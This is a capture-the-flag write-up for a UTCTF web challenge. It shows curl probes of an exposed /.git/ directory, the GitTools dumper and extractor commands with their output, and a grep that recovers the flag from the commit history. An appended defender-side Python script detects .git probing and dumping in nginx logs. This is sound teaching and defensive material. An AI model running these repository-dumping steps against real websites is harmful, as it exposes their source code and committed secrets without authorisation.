Instructions
Web dev skills go brrr
By Caleb (@eden.caleb.a on Discord)
Solution
Poking around the website, I didn’t find much other than documents, so I started to manually search around for some common directories/files. When I tried to access .git/, I received a 403 HTTP error instead of a 404, indicating that the directory does exist.
$ curl guppy.utctf.live:8549/.git/
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.21.6</center>
</body>
</html>
I checked the HEAD file to confirm that we have read access to the files within the directory:
$ curl guppy.utctf.live:8549/.git/HEAD
ref: refs/heads/main
From here, I used GitTools to dump and extract the flag.
- Dump the repository:
$ ./gitdumper.sh http://guppy.utctf.live:8549/.git/ ../repo
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[-] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[-] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/e2/a975aa4dc20fd279591267b64617f73ede199e
[+] Downloaded: objects/bb/a639202cd2e6228b65a4d20bf0e9c38dd4e479
[+] Downloaded: objects/9d/525e298e3b9fc70c9e8110b593c65c8b897361
[+] Downloaded: objects/d6/cebe17a2ef4c5eec1f7ee1ed1b77d9a66be79c
[+] Downloaded: objects/73/f3e2181302f0aef5da05ae4f4948aba58ebded
[+] Downloaded: objects/45/0b6bb9e3944e09e345348840a0311e7b70e2e0
[+] Downloaded: objects/9c/8220f43c7c86d4b7d284c42c9cd515f15e79c8
[+] Downloaded: objects/1d/2961fb02140ea819212ac081b0291c323fd056
- Restore contents of commits:
$ ./extractor.sh ../repo ../repo-extracted
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: bba639202cd2e6228b65a4d20bf0e9c38dd4e479
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/documentation.html
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/index.html
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/links.html
[+] Found file: ../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/secrets.html
[+] Found commit: e2a975aa4dc20fd279591267b64617f73ede199e
[+] Found file: ../repo-extracted/1-e2a975aa4dc20fd279591267b64617f73ede199e/documentation.html
[+] Found file: ../repo-extracted/1-e2a975aa4dc20fd279591267b64617f73ede199e/index.html
[+] Found file: ../repo-extracted/1-e2a975aa4dc20fd279591267b64617f73ede199e/links.html
- Search for the flag:
$ grep -Ri utflag ../repo-extracted/
../repo-extracted/0-bba639202cd2e6228b65a4d20bf0e9c38dd4e479/secrets.html: <li>If you squint your eyes, every country's flag contains very tiny text which reads: utflag{gitR3fl0g}</li>
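A defender-side view of the same requests, as an added example that is not part of the original writeup: the script reads nginx access-log lines in the default "combined" format and separates clients that only probed /.git/ from clients that were actually served repository metadata or objects. The log lines, IP addresses, timestamps and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in nginx's default "combined" format (illustrative IPs and times).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /.git/ HTTP/1.1" 403 153 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /.git/HEAD HTTP/1.1" 200 21 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /.git/packed-refs HTTP/1.1" 404 153 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:01:02 +0000] "GET /.git/objects/bb/a639202cd2e6228b65a4d20bf0e9c38dd4e479 HTTP/1.1" 200 180 "-" "curl/8.0"
198.51.100.7 - - [01/Jan/2024:11:00:00 +0000] "GET /.git/ HTTP/1.1" 403 153 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:11:30:00 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
""".splitlines()

# ip ident user [time] "METHOD path PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
GIT_PATH_RE = re.compile(r'(?:^|/)\.git(?:/|$)')                     # any path component named .git
OBJECT_RE = re.compile(r'/\.git/objects/[0-9a-f]{2}/[0-9a-f]{38}$')  # loose object file

def summarize_git_access(lines):
    """Per client IP: .git requests seen, how many got a 2xx, how many of those were objects."""
    stats = defaultdict(lambda: {"probed": 0, "served": 0, "objects": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                                  # not a combined-format line
        path = m.group("path").split("?", 1)[0]       # ignore any query string
        if not GIT_PATH_RE.search(path):
            continue
        entry = stats[m.group("ip")]
        entry["probed"] += 1
        if m.group("status").startswith("2"):         # file content was actually returned
            entry["served"] += 1
            if OBJECT_RE.search(path):
                entry["objects"] += 1
    return dict(stats)

def classify(entry):
    """A 403/404 is only a probe; a 2xx on an object means history could be rebuilt."""
    if entry["objects"] > 0:
        return "repository-dumped"
    if entry["served"] > 0:
        return "metadata-exposed"
    return "probe-only"

if __name__ == "__main__":
    for ip, entry in summarize_git_access(SAMPLE_LOG).items():
        print(ip, classify(entry), entry)
```

Any client classified as "repository-dumped" should be treated as having every committed file, including ones deleted in later commits, so secrets that ever appeared in history need rotating.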